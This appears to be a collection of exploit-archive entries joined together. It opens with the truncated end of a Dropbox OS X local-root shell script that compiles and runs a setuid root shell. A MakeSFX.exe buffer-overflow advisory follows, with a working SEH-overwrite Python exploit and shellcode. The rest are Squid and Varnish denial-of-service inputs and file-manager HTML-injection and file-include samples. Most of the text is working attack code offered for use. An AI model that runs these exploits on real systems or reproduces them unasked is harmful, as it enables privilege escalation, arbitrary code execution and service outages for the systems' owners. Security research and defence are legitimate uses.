findbin="FinderLoadBundle" echo "Dropbox $findbin OS X local root exploit by cenobyte 2015" echo uname -v | grep -q ^Darwin || \ errx "this Dropbox exploit only works on OS X" [ ! -d "$helpertools" ] && \ errx "$helpertools does not exist" which -s gcc || \ errx "gcc not found" found=0 for finder in $(ls $helpertools/Dropbox_u*/$findbin); do stat -s "$finder" | grep -q "st_mode=0104" if [ $? -eq 0 ]; then found=1 break fi done [ $found -ne 1 ] && \ errx "couldn't find a setuid root $findbin" local -r finderdir=$(dirname $finder) local -r plist="${finderdir}/DropboxBundle.bundle/Contents/Info.plist" [ -f "$plist" ] || \ errx "FinderLoadBundle not vulnerable (cannot open $plist)" grep -q "<key>$cfversion</key>" "$plist" || \ errx "FinderLoadBundle not vulnerable (plist missing $cfversion)" echo "[-] creating temporary directory: /tmp/$tmp" mkdir /tmp/$tmp || \ errx "couldn't create /tmp/$tmp" echo "[-] linking $finder" ln "$finder" "/tmp/$tmp/$findbin" || \ errx "ln $finder /tmp/$tmp/$findbin failed" echo "[-] constructing bundle" mkdir -p "$bundle" || \ errx "cannot create $bundle" echo "#include <sys/stat.h>" > "$bundlesrc" echo "#include <sys/types.h>" >> "$bundlesrc" echo "#include <stdlib.h>" >> "$bundlesrc" echo "#include <unistd.h>" >> "$bundlesrc" echo "extern void init(void) __attribute__ ((constructor));" >> "$bundlesrc" echo "void init(void)" >> "$bundlesrc" echo "{" >> "$bundlesrc" echo " setuid(0);" >> "$bundlesrc" echo " setgid(0);" >> "$bundlesrc" echo " chown(\"$sh\", 0, 0);" >> "$bundlesrc" echo " chmod(\"$sh\", S_ISUID|S_IRWXU|S_IXGRP|S_IXOTH);" >> "$bundlesrc" echo "}" >> "$bundlesrc" echo "[-] creating $shsrc" echo "#include <unistd.h>" > "$shsrc" echo "#include <stdio.h>" >> "$shsrc" echo "#include <stdlib.h>" >> "$shsrc" echo "int" >> "$shsrc" echo "main()" >> "$shsrc" echo "{" >> "$shsrc" echo " setuid(0);" >> "$shsrc" echo " setgid(0);" >> "$shsrc" echo " system(\"/bin/bash\");" >> "$shsrc" echo " return(0);" >> "$shsrc" echo "}" >> "$shsrc" echo "[-] compiling root shell" gcc "$shsrc" -o "$sh" || \ errx "gcc failed for $shsrc" gcc -dynamiclib -o "$bundletarget" "$bundlesrc" || \ errx "gcc failed for $bundlesrc" echo "[-] executing $findbin using root shell payload" cd "/tmp/$tmp" ./$findbin mach_inject_bundle_stub.bundle 2>/dev/null 1>/dev/null [ $? -ne 4 ] && \ errx "exploit failed, $findbin seems not vulnerable" [ ! -f "$sh" ] && \ errx "$sh was not created, exploit failed" stat -s "$sh" | grep -q "st_mode=0104" || \ errx "$sh was not set to setuid root, exploit failed" echo "[-] entering root shell" "$sh" } main "$@" exit 0

''' [+] Credits: John Page aka hyp3rlinx [+] Website: hyp3rlinx.altervista.org [+] Source: http://hyp3rlinx.altervista.org/advisories/AS-MAKESFX-BUFF-OVERFLOW-09302015.txt Vendor: ================================ freeextractor.sourceforge.net/FreeExtractor freeextractor.sourceforge.net/FreeExtractor/MakeSFX.exe Vulnerable Product: ================================================== MakeSFX.exe v1.44 Mar 19 2001 & Dec 10 2009 versions Vulnerability Type: ============================ Stack Based Buffer Overflow CVE Reference: ============== N/A Vulnerability Details: ========================= Converts a zip file into a 32-bit GUI Windows self-extractor. Example usage: makesfx.exe /zip="source.zip" /sfx="output.exe" [/title="Your Title"] [/website="http://www.example.com"] [/intro="This is a test self extractor"] [/defaultpath="$desktop$\My Files"] [/autoextract] [/openexplorerwindow] [/shortcut="$desktop$\Program Shortcut.lnk|$targetdir$\Program.exe] [/delete] [/icon="MyIcon.ico"] [/overwrite] [/?] etc... The '/title' argument when supplied an overly long payload will overwrite NSEH & SEH exception handlers causing buffer overflow, we can then execute our aribitrary shellcode. I have seen some applications using MakeSFX.exe from .bat files for some automation purposes, if the local .bat file is replaced by malicious one attackers can cause mayhem on the system. Both versions from 2001 & 2009 are vulnerable but exploit setup will be off by 80 bytes. punksnotdead="/title"+"A"*1078+"BBBB"+"RRRR" #<---- SEH Handler control MakeSFX v1.44 (Dec 10 2009) punksnotdead="/title"+"A"*1158+"BBBB"+"RRRR" #<---- SEH Handler control MakeSFX v1.44 (Mar 19 2001) POC exploit code(s): ==================== We will exploit MakeSFX v1.44 (Mar 19 2001). I find one POP,POP,RET instruction in MakeSFX.exe with ASLR, SafeSEH, Rebase all set to False, but it contains null 0x00. So no suitable SEH instruction address avail, I will instead have to use mona.py to look for POP,POP,RET instruction in outside modules and we find some... e.g. 0x77319529 : pop esi # pop edi # ret | {PAGE_READONLY} Python script to exploitz! ========================== ''' import struct,os,subprocess #MakeSFX v1.44 (Mar 19 2001) pgm="C:\\hyp3rlinx\\MakeSFX.exe " #shellcode to pop calc.exe sc=("\x31\xF6\x56\x64\x8B\x76\x30\x8B\x76\x0C\x8B\x76\x1C\x8B" "\x6E\x08\x8B\x36\x8B\x5D\x3C\x8B\x5C\x1D\x78\x01\xEB\x8B" "\x4B\x18\x8B\x7B\x20\x01\xEF\x8B\x7C\x8F\xFC\x01\xEF\x31" "\xC0\x99\x32\x17\x66\xC1\xCA\x01\xAE\x75\xF7\x66\x81\xFA" "\x10\xF5\xE0\xE2\x75\xCF\x8B\x53\x24\x01\xEA\x0F\xB7\x14" "\x4A\x8B\x7B\x1C\x01\xEF\x03\x2C\x97\x68\x2E\x65\x78\x65" "\x68\x63\x61\x6C\x63\x54\x87\x04\x24\x50\xFF\xD5\xCC") #punksnotdead="A"*1158+"RRRR"+"BBBB" #<--- KABOOOOOOM! nseh="\xEB\x06"+"\x90"*2 seh=struct.pack('<L', 0x76F29529) punksnotdead="/title"+"A"*1158 + nseh + seh + sc + "\x90"*10 subprocess.Popen([pgm, punksnotdead], shell=False) ''' Disclosure Timeline: ========================================================= Vendor Notification: NA Sept 30, 2015 : Public Disclosure Exploitation Technique: ======================= Local Tested successfully on Windows SP1 DisableExceptionChainValidation in registry set to '1' value of 1 disables the registry entry that prevents SEH overwrites. =========================================================== [+] Disclaimer Permission is hereby granted for the redistribution of this advisory, provided that it is not altered except by reformatting it, and that due credit is given. Permission is explicitly given for insertion in vulnerability databases and similar, provided that due credit is given to the author. The author is not responsible for any misuse of the information contained herein and prohibits any malicious use of all security related information or exploits by the author or elsewhere. by hyp3rlinx '''

source: https://www.securityfocus.com/bid/58319/info Squid is prone to a remote denial-of-service vulnerability. Attackers can exploit this issue to crash the application, resulting in denial-of-service conditions. Squid 3.2.5 is vulnerable; other versions may also be affected. Request -- cut -- #!/usr/bin/env python print 'GET /index.html HTTP/1.1' print 'Host: localhost' print 'X-HEADSHOT: ' + '%XX' * 19000 print '\r\n\r\n' -- cut -- Response -- cut -- HTTP/1.1 200 OK Vary: X-HEADSHOT -- cut --

source: https://www.securityfocus.com/bid/58313/info File Manager is prone to an HTML-injection vulnerability and a local file-include vulnerability. Successful exploits will allow attacker-supplied HTML and script code to run in the context of the affected browser, steal cookie-based authentication credentials and open or run arbitrary files in the context of the web server process. Other attacks are also possible. File Manager 1.2 is vulnerable; other versions may also be affected. Local file-include: <div id="bodyspace"><div id="main_menu"><h1>File Manager</h1></div><div id="main_left"> <img src="http://www.example.com/images/wifilogo2.png" alt="" title="" border="0"><ul class="menu"><li class="item-101 current active"> <a href="http://www.example.com/" target="_blank">Hilfe</a></li><li class="item-110"> <a href="http://www.example.com/index.php/feedback-support" target="_blank">Kontakt / Feedback</a></li></ul></div> <div id="module_main"><bq>Files</bq><p><a href="..">..</a><br> <a href="1234.png.txt.iso.php.asp">1234.png.txt.iso.php.asp</a> ( 95.8 Kb, 2013-02-11 07:41:12 +0000)<br> <a href="[../../>[UNAUTHORIZED LOCAL FILE/PATH INCLUDE VULNERABILITY]]">[../../>[UNAUTHORIZED LOCAL FILE/PATH INCLUDE VULNERABILITY]]</a> ( 27.3 Kb, 2013-02-11 07:45:01 +0000)<br /> <a href="About/">About/</a> ( 0.1 Kb, 2012-10-10 18:20:14 +0000)<br /> </p><form action="" method="post" enctype="multipart/form-data" name="form1" id="form1"><label>upload file <input type="file" name="file" id="file" /></label><label><input type="submit" name="button" id="button" value="Submit" /> </label></form></div></center></body></html></iframe></a></p></div></div> HTML-injection : <div id="bodyspace"><div id="main_menu"><h1>File Manager</h1></div><div id="main_left"> <img src="http://www.example.com/images/wifilogo2.png" alt="" title="" border="0"><ul class="menu"><li class="item-101 current active"> <a href="http://www.example.com/" target="_blank">Hilfe</a></li><li class="item-110"> <a href="http://www.example.com/index.php/feedback-support" target="_blank">Kontakt / Feedback</a></li></ul></div> <div id="module_main"><bq>Files</bq><p><a href="..">..</a><br> <a href="[PERSISTENT INJECTED SCRIPT CODE!].png.txt.iso.php.asp">[PERSISTENT INJECTED SCRIPT CODE!].png.txt.iso.php.asp</a> ( 95.8 Kb, 2013-02-11 07:41:12 +0000)<br> <a href="[PERSISTENT INJECTED SCRIPT CODE!]">[PERSISTENT INJECTED SCRIPT CODE!]</a> ( 27.3 Kb, 2013-02-11 07:45:01 +0000)<br /> <a href="About/">About/</a> ( 0.1 Kb, 2012-10-10 18:20:14 +0000)<br /> </p><form action="" method="post" enctype="multipart/form-data" name="form1" id="form1"><label>upload file <input type="file" name="file" id="file" /></label><label><input type="submit" name="button" id="button" value="Submit" /> </label></form></div></center></body></html></iframe></a></p></div></div>

source: https://www.securityfocus.com/bid/58314/info Varnish Cache is prone to multiple denial-of-service vulnerabilities. An attacker can exploit these issues to crash the application, effectively denying service to legitimate users. Varnish Cache 2.1.5 is vulnerable; other versions may also be affected. The following example data is available: HTTP/1.1 200 OK Content-Type: text/xml; charset=utf-8 Content-Length: 99999999999999999 HTTP/1.1 200 OK Content-Length: 2147483647